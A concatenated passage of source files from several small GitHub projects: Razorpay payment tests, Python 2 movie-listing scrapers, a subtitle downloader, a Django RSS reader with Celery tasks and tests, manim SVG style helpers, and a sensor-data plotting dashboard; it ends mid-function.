metadata (dict) | text (string, 60–3.49M chars)
---|---|
{
"source": "5parkp1ug/razorpay-python",
"score": 2
} |
#### File: razorpay-python/tests/test_client_payment.py
```python
import responses
import json
from .helpers import mock_file, ClientTestCase
class TestClientPayment(ClientTestCase):
def setUp(self):
super(TestClientPayment, self).setUp()
self.base_url = '{}/payments'.format(self.base_url)
@responses.activate
def test_payment_all(self):
result = mock_file('payment_collection')
url = self.base_url
responses.add(responses.GET, url, status=200,
body=json.dumps(result), match_querystring=True)
self.assertEqual(self.client.payment.all(), result)
@responses.activate
def test_payment_all_with_options(self):
count = 1
result = mock_file('payment_collection_with_one_payment')
url = '{}?count={}'.format(self.base_url, count)
responses.add(responses.GET, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(self.client.payment.all({'count': count}), result)
@responses.activate
def test_payment_fetch(self):
result = mock_file('fake_payment')
url = '{}/{}'.format(self.base_url, self.payment_id)
responses.add(responses.GET, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(self.client.payment.fetch('fake_payment_id'), result)
@responses.activate
def test_payment_capture(self):
result = mock_file('fake_captured_payment')
url = '{}/{}/capture'.format(self.base_url, self.payment_id)
responses.add(responses.POST, url, status=200,
body=json.dumps(result), match_querystring=True)
self.assertEqual(self.client.payment.capture(self.payment_id,
amount=5100), result)
@responses.activate
def test_refund_create(self):
result = mock_file('fake_refund')
url = '{}/{}/refund'.format(self.base_url, self.payment_id)
responses.add(responses.POST, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(self.client.payment.refund(self.payment_id, 2000),
result)
@responses.activate
def test_transfer(self):
param = {
'transfers': {
'currency': {
'amount': 100,
'currency': 'INR',
'account': 'dummy_acc'
}
}
}
result = mock_file('transfers_collection_with_payment_id')
url = '{}/{}/transfers'.format(self.base_url, self.payment_id)
responses.add(responses.POST, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(self.client.payment.transfer(self.payment_id, param),
result)
@responses.activate
def test_transfer_fetch(self):
result = mock_file('transfers_collection_with_payment_id')
url = '{}/{}/transfers'.format(self.base_url, self.payment_id)
responses.add(responses.GET, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(self.client.payment.transfers(self.payment_id), result)
@responses.activate
def test_bank_transfer_fetch(self):
result = mock_file('fake_bank_transfer')
url = '{}/{}/bank_transfer'.format(self.base_url, self.payment_id)
responses.add(responses.GET,
url,
status=200,
body=result,
match_querystring=True)
response = self.client.payment.bank_transfer(self.payment_id)
self.assertEqual(response['virtual_account_id'], '<KEY>')
self.assertEqual(response['payment_id'], self.payment_id)
``` |
{
"source": "5parkp1ug/sgScraper",
"score": 3
} |
#### File: 5parkp1ug/sgScraper/eng_movies_provider.py
```python
import re
import urllib
from bs4 import BeautifulSoup
import unicodedata
import urlparse
class eng_movies_provider:
    """Scrapes the provider's listing pages and collects English movie URLs grouped by alphabetical range."""
def set_url(self, url):
self.url = url
self.level1_urls = {}
self.level2_urls = {}
def getSoup(self, url):
try:
html = urllib.urlopen(url)
except IOError:
return {
"status": False,
"message": "Please check your connectivity."
}
bs = BeautifulSoup(html.read(),"lxml")
return {
"status": True,
"soup": bs
}
def getUrls(self):
print "[INFO] Starting Scraping Level 1"
response = self.getSoup(self.url)
if response['status']:
bs = response['soup']
else:
return response
level1_tags = bs.findAll("a",{"class":"button"})
print "[RESULT] %d URLs found"%(len(level1_tags))
for tag in level1_tags:
range_text = unicodedata.normalize('NFKD', tag.text).encode('ascii','ignore').replace(" ","")
range_url = tag["href"]
# level1_urls[range_text] = range_url
self.scrape_level2(range_url)
return self.level2_urls
def scrape_level2(self, range_url):
print "[INFO] Starting Scraping Level 2"
#find the sub-categorization in the page and get their url
response = self.getSoup(range_url)
if response['status']:
bs = response['soup']
else:
return response
no_of_links = bs.findAll("a",href= re.compile('^\/English*'))
print "[RESULT] %d URLs found"%(len(no_of_links))
for item in no_of_links:
            movie_range = item.text.replace("English Movies", "").strip().strip("()").replace(" ", "")  # replace() rather than strip(), which removes characters, not a prefix
movie_range_url = range_url + item['href'][1:].replace(" ","%20")
# print movie_range +" --> "+ movie_range_url
self.level2_urls[movie_range] = movie_range_url
return self.level2_urls
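# A minimal usage sketch of the class above (the URL is a placeholder, not a real
# endpoint from this repository):
#
#   provider = eng_movies_provider()
#   provider.set_url("http://example.com/english-movies/")
#   urls = provider.getUrls()   # on success: {'A-B': 'http://example.com/...', ...}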
```
#### File: 5parkp1ug/sgScraper/get_all_links.py
```python
import re
import urllib
from datetime import datetime
from urlparse import urlparse
from bs4 import BeautifulSoup
url = "http://58.65.128.2:602/English%20Movies%20(H%20-%20L)/?sortby="
# url = "http://58.65.128.2:603/English Movies (S - T)/War Dogs 2016 HDTS?sortby="
result = []
def get_all_movies(url):
response = {}
o = urlparse(url)
base_url = o.netloc
html = urllib.urlopen(url)
bs = BeautifulSoup(html.read(),"lxml")
#find the no of available links
all_links = bs.findAll("tr",style = False)
for link in all_links:
full_url = "http://"+base_url+link.td.next.next.next.a['href']
full_url = full_url.encode("utf-8").lower()
movie_name = link.td.next.next.next.a.getText()
if "." not in movie_name and "xampp" not in movie_name:
print "Directory: " + link.td.next.next.next.a.getText()
get_all_movies(full_url)
        elif any(ext in full_url for ext in (
                ".m4v", ".rm", ".mov", ".wmv", ".divx", ".rmvb", ".vob", ".avi",
                ".mp4", ".flv", ".mkv", ".zip", ".dat", ".rar")):
response = {
'url' : full_url,
'name': movie_name
}
print response
result.append(response)
print "===================================="
elif ".srt" in full_url or ".sub" in full_url:
#subtitle found do something
pass
elif ".mpg" in full_url or ".mht" in full_url or ".jpeg" in full_url or ".jpg" in full_url:
pass
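# Usage sketch: crawl the listing recursively and collect the movie links found,
# using the module-level `url` and `result` defined above.
#
#   get_all_movies(url)
#   print "%d movie files found" % len(result)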
```
#### File: 5parkp1ug/sgScraper/sgMovies_muli_proc.py
```python
import re
import urllib
import Queue
import urlparse
from bs4 import BeautifulSoup
from datetime import datetime
from multiprocessing import Pool, Value
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
def scrape_level1(url):
bs = BeautifulSoup(url.read(),"lxml")
level1_tags = bs.findAll("a",{"class":"button"})
for tag in level1_tags:
level1_urls.append(tag["href"])
scrape_level2(tag["href"])
def scrape_level2(url):
#find the sub-categorization in the page and get their url
html = urllib.urlopen(url)
bs = BeautifulSoup(html.read(),"lxml")
no_of_links = bs.findAll("tr",{"onclick":True})
for link in no_of_links:
path = link['onclick'].strip("window.location='/").strip("=';").strip("?sortby").replace(" ","%20")
full_url = url+path
level2_urls.append(full_url)
def init(counter):
global moviectr
moviectr = counter
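# Note: init() is passed as the Pool initializer below, so each worker process
# receives the shared multiprocessing.Value and exposes it as the global
# `moviectr` that scrape_level3() increments.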
def scrape_level3(full_url):
print "calling scrape level 3"
#find the name of the movies from the sub-categpry page
html = urllib.urlopen(full_url)
bs = BeautifulSoup(html.read(),"lxml")
    # filter on the href attribute (as in scrape_level2); otherwise BeautifulSoup
    # treats the second positional argument as a class filter
    movies = bs.findAll("a", href=re.compile('^\/English*'))
print len(movies)
o = urlparse.urlparse(full_url)
url = o.netloc
for movie in movies:
print bcolors.HEADER + "Movie Name - %s"%(movie.getText()) # Name of the movie
level3_urls.append(movie.getText())
        # moviectr is a multiprocessing.Value, so increment its .value under its lock
        with moviectr.get_lock():
            moviectr.value += 1
        print moviectr.value
#print bcolors.OKBLUE + "http://"+url+path
# path = movie['href'].replace(" ","%20")
# if path != '/':
# if "Harry" in "http://"+url+path:
# print "http://"+url+path
##################################################################################
#Variables
level1_urls = []
level2_urls = []
level3_urls = []
# capture current time
startTime = datetime.now()
url = urllib.urlopen('http://www.sharinggalaxy.com/14/ToServer.jsp?type=em&server=three')
scrape_level1(url)
print level1_urls
print level2_urls
#create a Multiprocessing value for counter
moviectr = Value('i',1)
print moviectr
p = Pool(initializer=init, initargs=(moviectr,))
p.map(scrape_level3,level2_urls)
print moviectr
# print current time minus the start time
print datetime.now()-startTime
``` |
{
"source": "5parkp1ug/SubtitleDownloader",
"score": 3
} |
#### File: 5parkp1ug/SubtitleDownloader/getSub.py
```python
import os, hashlib, sys, urllib2
''' 1 = File does not exist
2 = Subtitle not found
'''
class utilities(object):
def __init__(self, name):
self.name = name
def get_hash(self):
self.readsize = 64 * 1024
try:
with open(self.name, 'rb') as self.f:
self.size = os.path.getsize(self.name)
self.data = self.f.read(self.readsize)
self.f.seek(-self.readsize, os.SEEK_END)
self.data += self.f.read(self.readsize)
self.calHash = hashlib.md5(self.data).hexdigest()
return 0
except IOError:
return 1
def get_subtitle(self):
self.url = 'http://sandbox.thesubdb.com/?action=download&hash='+str(self.calHash)+'&language=en'
self.opener = urllib2.build_opener()
self.req = urllib2.Request(self.url)
self.req.add_header('User-Agent', 'SubDB/1.0 (GetSubtitle/0.1; http://github.com/abhijh/getsubtitle)')
try:
self.subtitle = self.opener.open(self.req)
return 0
except (urllib2.HTTPError):
return 2
def write_subtitle(self):
with open(self.name[0:-4]+'.srt','w') as self.file:
self.file.write(self.subtitle.read())
return 0
def main():
process = utilities(sys.argv[1])
    response = process.get_hash()
    if response == 1:
        print 'IOError'
    else:
        response = process.get_subtitle()
        if response == 2:
            print 'Subtitle not found on Server'
        else:
            response = process.write_subtitle()
            if response == 0:
print 'Subtitle Generated Successfully'
else:
print 'Subtitle found but could not be written.'
if __name__ == '__main__':
main()
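# Usage sketch (run from a shell; the video filename is just an example):
#
#   python getSub.py SomeMovie.avi
#
# The hash computed in get_hash() is the md5 of the first and last 64 KiB of the
# file, which is the hash the thesubdb.com API expects.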
``` |
{
"source": "5pence/rss_helper",
"score": 2
} |
#### File: management/commands/fetch_feed.py
```python
from django.core.management.base import BaseCommand
from feed.tasks import import_feed_task
from rssfeed.models import Feed
class Command(BaseCommand):
    help = 'Queue an import task for the feed with the given --id'
def add_arguments(self, parser):
parser.add_argument('--url', type=str)
parser.add_argument('--id', type=int)
def handle(self, *args, **options):
feed = Feed.objects.get(pk=options['id'])
import_feed_task.delay(feed.id)
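# Usage sketch (Django management command; the id value is just an example):
#
#   python manage.py fetch_feed --id 42
#
# Note that --url is accepted by add_arguments() but not used by handle().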
```
#### File: rss_helper/feed/tasks.py
```python
import logging
from datetime import timedelta
from django.utils import timezone
from django.conf import settings
from celery import shared_task
from rssfeed.models import Feed
from feed.utils import import_items, ImportFailed
logger = logging.getLogger(__name__)
@shared_task
def import_feed_task(feed_id: int):
logger.info('fetching id %d' % feed_id)
feed = Feed.objects.get(pk=feed_id)
try:
import_items(feed)
feed.last_checked_at = timezone.now()
feed.fail_count = 0
except ImportFailed:
""" If for any reason the fetching of the remote xml fails we will increase a fail counter
the fail counter is also a threshold, after X number of fails don't bother
we set last_checked_at to the future, our import_feeds checks only for feeds that
were last checked in the past. """
feed.fail_count += 1
feed.last_checked_at = timezone.now() + timedelta(minutes=(2 ** feed.fail_count))
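        # e.g. fail_count 1 -> retry in 2 min, 3 -> 8 min, 10 -> 1024 min (~17 h)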
feed.save()
@shared_task
def import_feeds():
""" Search for feeds that are in need of updating
ignore any feeds that have surpassed a certain configurable threshold
see settings to update FAIL_COUNT_THRESHOLD to a suitable value """
fail_count_threshold = settings.FAIL_COUNT_THRESHOLD
feeds = Feed.objects.filter(last_checked_at__lte=timezone.now(), fail_count__lte=fail_count_threshold)
for feed in feeds:
import_feed_task.delay(feed.id)
```
#### File: rss_helper/rssfeed/tests.py
```python
from django.test import TestCase, Client
from django.contrib.auth.models import User
from django.urls import reverse
from django.utils import timezone
from rssfeed.models import Feed, FeedItem, Comment
from feed.tasks import import_feed_task
from datetime import timedelta
class FeedTest(TestCase):
def setUp(self):
""" Set up our test user """
password = '<PASSWORD>'
self.user = User.objects.create(
username='<EMAIL>',
password=password,
is_active=True
)
self.user.set_password(password)
self.user.save()
self.client = Client()
self.client.login(username=self.user.username, password=password)
    def test_add_feed_success(self):
        """ Add a feed, ensure the success message is displayed on the page,
        and ensure that a second user (user2) does not see the feed
        """
url = reverse('add_feed')
# Get the count of feeds
before_count = self.user.feed_set.all().count()
response = self.client.post(
url,
data={
'title': 'random feed',
'url': 'http://www.nu.nl/rss/Algemeen'
})
# Assert status code is OK
self.assertEqual(response.status_code, 200)
# Assert message is displayed on page
self.assertContains(response, 'Your feed was added, '
'it may take up to a minute for you '
'to see some feed items')
# Get the current count of feeds
after_count = self.user.feed_set.all().count()
# Assert we have an additional one
self.assertEqual(after_count - before_count, 1)
# Create a second user
password = '<PASSWORD>'
self.user2 = User.objects.create(
username='<EMAIL>',
password=password,
is_active=True
)
self.user2.set_password(password)
self.user2.save()
self.client = Client()
        # login user2
        self.client.login(username=self.user2.username, password=password)
# Get the current count of feeds for user2
user2_count = self.user2.feed_set.all().count()
# Assert that user2 count is still zero
self.assertEqual(user2_count, 0)
def test_add_feed_fail_no_auth(self):
""" Check an unauthorised user cannot add a feed """
# Create a client
c = Client()
# Go to add feed page
url = reverse('add_feed')
# Count current number of feeds
before_count = self.user.feed_set.all().count()
# Attempt to add a feed
response = c.post(
url,
data={
'title': 'random feed',
'url': 'https://google.com/xml'
})
        # Check we're redirected as we are unauthorised
self.assertEqual(response.status_code, 302)
# Check no feeds were added to the database
self.assertEqual(before_count, self.user.feed_set.all().count())
def test_add_feed_fail_bad_url(self):
""" Test adding a feed with a bad url string that isn't a rss feed """
url = reverse('add_feed')
# Count all feeds
before_count = self.user.feed_set.all().count()
# Post a feed with a bad url
response = self.client.post(
url,
data={
'title': 'random feed',
'url': 'https://google.com/xml'
})
self.assertEqual(response.status_code, 200)
        # Check the error message is returned on the page
self.assertContains(response, 'Invalid RSS Feed')
# Check no feed was added
self.assertEqual(before_count, self.user.feed_set.all().count())
def test_add_feed_fail_duplicate_title(self):
""" Test adding a feed with a duplicate title string """
response = ''
for i in range(0, 2):
url = reverse('add_feed')
# Post a feed with a bad url
response = self.client.post(
url,
data={
'title': 'random feed',
'url': 'http://www.nu.nl/rss/Algemeen'
})
self.assertEqual(response.status_code, 200)
        # Check the duplicate-title error message is returned on the page
self.assertContains(response, 'You already have that title in your feed, please choose another.')
        # Check only the first feed was added (the duplicate was rejected)
self.assertEqual(self.user.feed_set.all().count(), 1)
def test_update_feed(self):
""" Test to update feed details """
feed = Feed.objects.create(
user=self.user,
title='random feed',
url='http://www.nu.nl/rss/Algemeen'
)
url = reverse('update_feed', kwargs={'pk': feed.id})
# get current feed count
before_count = self.user.feed_set.all().count()
# update feed with new title
response = self.client.post(
url,
data={
'title': 'another random feed',
'url': 'http://www.nu.nl/rss/Algemeen'
},
follow=True
)
self.assertEqual(response.status_code, 200)
# check we get success message
self.assertContains(response, "successfully updated your feed")
self.assertContains(response, "another random feed")
# count feeds again
after_count = self.user.feed_set.all().count()
# ensure no duplicates were made
self.assertEqual(before_count, after_count)
def test_add_bookmark(self):
""" Bookmark a feed item and ensure it shows on my favourites page """
# create a feed
feed = Feed.objects.create(
user=self.user,
title='random feed',
url='http://www.nu.nl/rss/Algemeen'
)
# add a feed item to feed, although the model presently defaults is_bookmarked to False set it anyway
feeditem = FeedItem.objects.create(
feed=feed,
title='great feed item',
text='some text about great feed item',
is_bookmarked=False,
url='https://google.com'
)
# goto my favourites page and ensure the feed item is not there
url = reverse('my_favourite_feeds')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, 'random feed')
# bookmark the feed item
url = reverse('toggle_bookmark', kwargs={'pk': feeditem.id})
self.client.get(url)
# goto my favourites page and ensure the feed item is there
url = reverse('my_favourite_feeds')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'random feed')
self.assertContains(response, 'Favourite items')
self.assertContains(response, '<mark>1</mark>')
    def test_unread_count(self):
        """ Add a feed and a feed item, check the unread counter shows 1, then visit the item and check 'No unread items' is shown """
# create a feed
feed = Feed.objects.create(
user=self.user,
title='random feed',
url='http://www.nu.nl/rss/Algemeen'
)
# add a feed item to feed
feeditem = FeedItem.objects.create(
feed=feed,
title='great feed item',
text='some text about great feed item',
url='https://google.com'
)
# goto my_feeds page
url = reverse('my_feeds')
response = self.client.get(url)
# make sure Unread items:1 is on page
self.assertContains(response, 'Unread items')
self.assertContains(response, '<mark>1</mark>')
# now visit that feed item
url = reverse('feed_item', kwargs={'pk': feeditem.id})
response = self.client.get(url)
# ensure the text of the feed item is present
self.assertContains(response, 'great feed item')
# go back to my_feeds
url = reverse('my_feeds')
# Ensure that 'No unread items' is on page
response = self.client.get(url)
self.assertContains(response, 'No unread items')
def test_remove_feed(self):
# create feed
feed = Feed.objects.create(
user=self.user,
title='random feed',
url='http://www.nu.nl/rss/Algemeen'
)
# goto my_feeds page and ensure it is there
url = reverse('my_feeds')
response = self.client.get(url)
self.assertContains(response, 'random feed')
# remove the feed
url = reverse('remove_feed', kwargs={'pk': feed.id})
# goto my_feeds page and ensure we get the message and the feed is not there
response = self.client.get(
url,
follow=True
)
self.assertContains(response, 'Your feed was deleted')
self.assertNotContains(response, 'random feed')
def test_add_and_remove_comment(self):
feed = Feed.objects.create(
user=self.user,
title='random feed',
url='http://www.nu.nl/rss/Algemeen'
)
# add a feed item to feed, although the model presently defaults is_bookmarked to False set it anyway
feeditem = FeedItem.objects.create(
feed=feed,
title='great feed item',
text='some text about great feed item',
is_bookmarked=False,
url='https://google.com'
)
# add a comment to the feed item
comment = Comment.objects.create(
feed_item=feeditem,
text='a small comment'
)
# check the comment shows on page
url = reverse('feed_item', kwargs={'pk': feeditem.id})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'a small comment')
# now delete comment
url = reverse('delete_comment', kwargs={'pk': comment.id})
self.client.get(url)
# goto the feed item
url = reverse('feed_item', kwargs={'pk': feeditem.id})
response = self.client.get(url)
# ensure we get delete message and that the comment is no longer there
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'Your comment was deleted')
self.assertNotContains(response, 'a small comment')
    def test_feed_import_fail_backoff(self):
        """ Test the exponential backoff algorithm by using a bad feed url,
        and ensure a 'Restart Feed' button is present on the My Feeds page after more than 10 failed fetches
        """
feed = Feed.objects.create(
title='test',
url='https://google.com/xml',
user=self.user
)
# Loop the fail 11 times
for i in range(0, 11):
# get the feed
import_feed_task(feed.id)
# refresh what's being held in the database
feed.refresh_from_db()
# assert the fail count increased by 1
self.assertEqual(feed.fail_count, i + 1)
            # calculate the expected next run time: now + 2**fail_count minutes
next_run_datetime = timezone.now() + timedelta(minutes=2 ** feed.fail_count)
""" Due to microseconds being in the datetime object and local timezone.now()
minutely different to the database timezone.now() we assert our calculated time
is almost equal within 1 second to the actual time recorded in database
"""
            self.assertAlmostEqual(
                feed.last_checked_at,
                next_run_datetime,
                delta=timedelta(seconds=1)
            )
# now get the content of my feeds page
response = self.client.get('/rssfeed/my_feeds/')
# as the feed has failed over 10 times assert failed message is on page
self.assertContains(response, 'Sorry, this feed has failed many times')
# and that the button labelled 'Restart Feed' is present
self.assertContains(response, 'Restart Feed')
# now we restart feed
url = reverse('reset_fail_count', kwargs={'pk': feed.id})
response = self.client.get(url, follow=True)
feed.refresh_from_db()
# ensure that fail count is set back to zero
self.assertEqual(feed.fail_count, 0)
# and that 'Restart Feed' does not appear on page
self.assertNotContains(response, 'Restart Feed')
``` |
{
"source": "5Points7Edges/manim",
"score": 3
} |
#### File: mobject/svg/style_utils.py
```python
__all__ = ["cascade_element_style", "parse_style", "parse_color_string"]
from xml.dom.minidom import Element as MinidomElement
from colour import web2hex
from ...utils.color import rgb_to_hex
from typing import Dict, List
CASCADING_STYLING_ATTRIBUTES: List[str] = [
"fill",
"stroke",
"fill-opacity",
"stroke-opacity",
]
# The default styling specifications for SVG images,
# according to https://www.w3.org/TR/SVG/painting.html
# (ctrl-F for "initial")
SVG_DEFAULT_ATTRIBUTES: Dict[str, str] = {
"fill": "black",
"fill-opacity": "1",
"stroke": "none",
"stroke-opacity": "1",
}
def cascade_element_style(
element: MinidomElement, inherited: Dict[str, str]
) -> Dict[str, str]:
"""Collect the element's style attributes based upon both its inheritance and its own attributes.
SVG uses cascading element styles. A closer ancestor's style takes precedence over a more distant ancestor's
style. In order to correctly calculate the styles, the attributes are passed down through the inheritance tree,
updating where necessary.
Note that this method only copies the values and does not parse them. See :meth:`parse_color_string` for converting
from SVG attributes to manim keyword arguments.
Parameters
----------
element : :class:`MinidomElement`
Element of the SVG parse tree
inherited : :class:`dict`
Dictionary of SVG attributes inherited from the parent element.
Returns
-------
:class:`dict`
Dictionary mapping svg attributes to values with `element`'s values overriding inherited values.
"""
style = inherited.copy()
# cascade the regular elements.
for attr in CASCADING_STYLING_ATTRIBUTES:
entry = element.getAttribute(attr)
if entry:
style[attr] = entry
# the style attribute should be handled separately in order to
# break it up nicely. furthermore, style takes priority over other
# attributes in the same element.
style_specs = element.getAttribute("style")
if style_specs:
for style_spec in style_specs.split(";"):
try:
key, value = style_spec.split(":")
except ValueError as e:
if not style_spec.strip():
                    # there was just a stray semicolon at the end, producing an empty string
pass
else:
raise e
else:
style[key.strip()] = value.strip()
return style
def parse_color_string(color_spec: str) -> str:
"""Handle the SVG-specific color strings and convert them to HTML #rrggbb format.
Parameters
----------
color_spec : :class:`str`
String in any web-compatible format
Returns
-------
:class:`str`
Hexadecimal color string in the format `#rrggbb`
"""
if color_spec[0:3] == "rgb":
# these are only in integer form, but the Colour module wants them in floats.
splits = color_spec[4:-1].split(",")
if splits[0][-1] == "%":
# if the last character of the first number is a percentage,
# then interpret the number as a percentage
parsed_rgbs = [float(i[:-1]) / 100.0 for i in splits]
else:
parsed_rgbs = [int(i) / 255.0 for i in splits]
hex_color = rgb_to_hex(parsed_rgbs)
elif color_spec[0] == "#":
        # it's OK, treat it as a standard hex color string.
hex_color = color_spec
else:
# attempt to convert color names like "red" to hex color
hex_color = web2hex(color_spec, force_long=True)
return hex_color
def fill_default_values(svg_style: Dict) -> None:
"""
Fill in the default values for properties of SVG elements,
if they are not currently set in the style dictionary.
Parameters
----------
svg_style : :class:`dict`
Style dictionary with SVG property names. Some may be missing.
    Notes
    -----
    The style dictionary is modified in place; nothing is returned.
"""
for key in SVG_DEFAULT_ATTRIBUTES:
if key not in svg_style:
svg_style[key] = SVG_DEFAULT_ATTRIBUTES[key]
def parse_style(svg_style: Dict[str, str]) -> Dict:
"""Convert a dictionary of SVG attributes to Manim VMobject keyword arguments.
Parameters
----------
svg_style : :class:`dict`
Style attributes as a string-to-string dictionary. Keys are valid SVG element attributes (fill, stroke, etc)
Returns
-------
:class:`dict`
Style attributes, but in manim kwargs form, e.g., keys are fill_color, stroke_color
"""
manim_style = {}
fill_default_values(svg_style)
if "fill-opacity" in svg_style:
manim_style["fill_opacity"] = float(svg_style["fill-opacity"])
if "stroke-opacity" in svg_style:
manim_style["stroke_opacity"] = float(svg_style["stroke-opacity"])
# nones need to be handled specially
if "fill" in svg_style:
if svg_style["fill"] == "none":
manim_style["fill_opacity"] = 0
else:
manim_style["fill_color"] = parse_color_string(svg_style["fill"])
if "stroke" in svg_style:
if svg_style["stroke"] == "none":
# In order to not break animations.creation.Write,
# we interpret no stroke as stroke-width of zero and
# color the same as the fill color, if it exists.
manim_style["stroke_width"] = 0
if "fill_color" in manim_style:
manim_style["stroke_color"] = manim_style["fill_color"]
else:
manim_style["stroke_color"] = parse_color_string(svg_style["stroke"])
return manim_style
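# A small worked example of parse_style() based on the code above (the exact hex
# string assumes colour.web2hex("red", force_long=True) returns "#ff0000"):
#
#   parse_style({"fill": "red", "stroke": "none"})
#   # -> {'fill_opacity': 1.0, 'stroke_opacity': 1.0, 'fill_color': '#ff0000',
#   #     'stroke_width': 0, 'stroke_color': '#ff0000'}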
``` |
{
"source": "5roop/SAAM_data_monitor",
"score": 2
} |
#### File: 5roop/SAAM_data_monitor/auth.py
```python
from secrets import hashes, salt
def pass_to_hash(password: str):
import hashlib
return hashlib.sha512(bytes(password.casefold(), "utf-8") + salt).hexdigest()
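# Usage sketch: the membership test against the imported `hashes` container is an
# assumption about how this helper is used elsewhere in the app, not code from this file.
#
#   if pass_to_hash(submitted_password) in hashes:
#       ...  # authenticated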
```
#### File: SAAM_data_monitor/utils/plot.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
plt.rcParams["font.family"] = "serif"
from utils import acquire as ac
from utils import DATA_COLLECTIONS
import datetime
import diskcache as dc
cache = dc.Cache("cache/")
# def memoize(f):
# global cache
# def inner(*args, **kwargs):
# key = f"{args}|{kwargs}"
# is_future = args[2] > datetime.datetime.utcnow()
# try:
# print("Using cached version.")
# return cache[key]
# except Exception:
# res = f(*args, **kwargs)
# if not is_future:
# cache[key] = res
# return res
# return inner
# @memoize
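# Unlike the commented-out memoize above (which skipped caching when the queried
# window extended into the future), diskcache's cache.memoize() below caches
# every call unconditionally.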
@cache.memoize()
def make_figure(loc_id, start_date, end_date, base, plot_type, **kwargs):
if plot_type == 'plot bed sensor data':
return plot_bed(loc_id, start_date, end_date, base, **kwargs)
if plot_type == 'check data presence':
return plot_status(loc_id, start_date, end_date, base, **kwargs)
if plot_type == "plot clip sensor data":
return plot_clip(loc_id, start_date, end_date, base, **kwargs)
if plot_type == 'plot cooking':
return plot_cooking(loc_id, start_date, end_date, base, **kwargs)
if plot_type == 'plot walking':
return plot_clip_mobility(loc_id, start_date, end_date, base, **kwargs)
def plot_bed(loc_id, start, end, base, **kwargs):
fig, ax = plt.subplots(figsize=(8, 5), dpi=100)
ax.set_xlim((start, end))
end = end + datetime.timedelta(hours=2)
# Sensor raw data acquisition
if not kwargs.get("skip_mags", False):
payload = list()
for collection in DATA_COLLECTIONS:
payload += ac.download(loc_id, {"$regex":"sens_bed_accel_"}, start, end, base=base, collection=collection)
# payload = ac.download(loc_id, {"$regex":"sens_bed_accel_"}, start, end, base=base)
# payload += ac.download(loc_id, {"$regex":"sens_bed_accel_"}, start, end, base=base, )
for suffix in ["egw", "amb", "app"]:
cur_payload = [item for item in payload if item["SourceId"]==f'sens_bed_accel_{suffix}']
if cur_payload == []:
print(f"No data for {suffix}.")
continue
t, m = ac.magnitude_response_to_data(cur_payload)
ax.plot(pd.to_datetime(t, unit="ms"), m, label=suffix)
# Peak plotting:
extended_start = start - datetime.timedelta(days=1)
extended_end = end + datetime.timedelta(days=1)
pks = ac.download(loc_id, "feat_bed_accel_magnitude_peaks", extended_start, extended_end, collection="CoachingAdditionalDataSources", base=base)
if pks:
ls, ss = ac.peak_handler(pks)
ax.vlines(pd.to_datetime(ls, unit="s"), 0, 2, label="Large peaks", colors="r", linestyles="dashed", zorder=1)
ax.vlines(pd.to_datetime(ss, unit="s"), 0.5, 1.5, label="Small peaks", colors="g", linestyles="dotted", zorder=1)
else:
ax.text(start, 0.7, "No peak data available")
ax.set_ylim((0,2))
sleep_state = ac.download(loc_id, "feat_sleep_state", extended_start, extended_end, collection="CoachingAdditionalDataSources", base=base)
if sleep_state:
outs, ins, sleeps = ac.state_handler(sleep_state)
for i, item in enumerate(outs):
item = pd.to_datetime([*item], unit="s")
if i==0:
ax.hlines(0.5, item[0], item[1],
lw=10, colors="k", label="Out of bed")
else:
ax.hlines(0.5, item[0], item[1],
lw=10, colors="k")
for i, item in enumerate(ins):
item = pd.to_datetime([*item], unit="s")
if i==0:
ax.hlines(0.5, item[0], item[1],
lw=10, colors="r", label="In bed")
else:
ax.hlines(0.5, item[0], item[1],
lw=10, colors="r",)
for i, item in enumerate(sleeps):
item = pd.to_datetime([*item], unit="s")
if i==0:
ax.hlines(0.5, item[0], item[1],
lw=10, colors="tab:orange", label="Sleeping")
else:
ax.hlines(0.5, item[0], item[1],
lw=10, colors="tab:orange",)
else:
ax.text(start, 0.5, "No sleep state available")
ax.legend()
ax.set_title(f"{loc_id} bed sensor data, {base} database")
ax.set_ylabel("Magnitude (g)")
ax.set_xlabel("Datetime (UTC)")
fig.autofmt_xdate()
return fig
def plot_status(loc_id, start_date, end_date, base, **kwargs):
from .acquire import check_source_presence#_2 as check_source_presence
fig, ax = plt.subplots(figsize=(8, 5), dpi=100)
if "freq" not in kwargs.keys():
freq = "1h"
else:
freq = kwargs["freq"]
feature_list = ["sens_bed_accel_amb",
"sens_bed_accel_egw",
#"sens_bed_accel_app"
"sens_uwb_activity",
"sens_amb_1_temp",
"_power_",
*[f"sens_belt_accel_{i}" for i in [
'amb',
'app',
'egw']],
]
for i, source_id in enumerate(feature_list):
timerange, is_data = check_source_presence(
loc_id,
source_id,
start_date,
end_date,
base = base,
freq = freq)
jitter_factor = 0.05 # This shifts the points a bit to prevent overlap
jitter = i * jitter_factor
ax.scatter(timerange[:len(is_data)],
is_data + jitter,
label=source_id.replace("_", " "),
alpha=1,
s = 4,
)
#breakpoint()
ax.legend(loc="center right", ncol=2)
# ax.set_ylim((-0.1, 1.1))
ax.set_xlim((start_date, end_date))
ax.set_ylabel(f"Data present in {freq} intervals?")
ax.set_yticks([0,1], )
ax.set_yticklabels(["False", "True"])
ax.set_ylim([-0.2, 1.5])
ax.set_title(f"{loc_id}, sensor data on {base} database")
fig.autofmt_xdate()
return fig
def plot_status_mobility(loc_id, start_date, end_date, base, **kwargs):
from .acquire import check_source_presence#_2 as check_source_presence
fig, ax = plt.subplots(figsize=(8, 5), dpi=100)
if "freq" not in kwargs.keys():
freq = "1h"
else:
freq = kwargs["freq"]
feature_list = [#"sens_bed_accel_amb",
#"sens_bed_accel_egw",
#"sens_bed_accel_app"
#"sens_uwb_activity",
#"sens_amb_1_temp",
#"_power_",
*[f"sens_belt_accel_{i}" for i in [
'amb',
'app',
'egw']],
]
for i, source_id in enumerate(feature_list):
timerange, is_data = check_source_presence(
loc_id,
source_id,
start_date,
end_date,
